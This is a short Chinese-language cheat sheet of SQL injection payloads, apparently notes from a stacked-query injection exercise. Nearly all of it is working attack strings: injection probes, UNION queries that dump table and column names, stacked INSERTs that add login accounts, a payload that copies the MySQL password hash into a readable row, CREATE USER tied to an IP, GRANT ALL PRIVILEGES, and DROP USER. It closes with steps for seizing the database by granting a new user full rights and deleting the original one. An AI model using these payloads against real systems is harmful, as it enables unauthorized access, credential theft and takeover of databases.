使用
id=1' and 1=1--+
id=1' and 1=2--+
先确定是否存在注入。
页面返回不一样就说明存在注入
-999' union select 1,2,(select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database() limit 1)--+ 爆表
-999' union select 1,2,(select group_concat(column_name) from information_schema.columns where TABLE_NAME='users' limit 1)--+ 爆字段
知道表的列的情况下使用 insert into 插入语句进行增加账号。如果是管理表,直接添加管理员账号即可登录后台。
-999';insert into users(id,username,password)values(1000,'at0','123456')--+
访问 1000 即可访问到刚刚添加的账号。
-999';insert into users(id,username,password)values(1001,(select authentication_string from mysql.user limit 1),'123456')--+ 添加用户,将mysql的登陆密码写入用户1001的密码中,在经过查询得到密码
-999';insert into users(id,username,password)values(1002,(select version()),'123456')--+ 获取版本信息
创建用户
1';create user 'qingwu2@'36.237.252.58' identified by '1234567'; %23
给权限
1';GRANT ALL PRIVILEGES ON *.* TO lhz@localhost;%23
删除
1';drop user lhz@localhost;%23
自己给自己设置一个用户 删除原来的用户 先给设置的用户一个所有的权限 然后再删除 然后再登录试试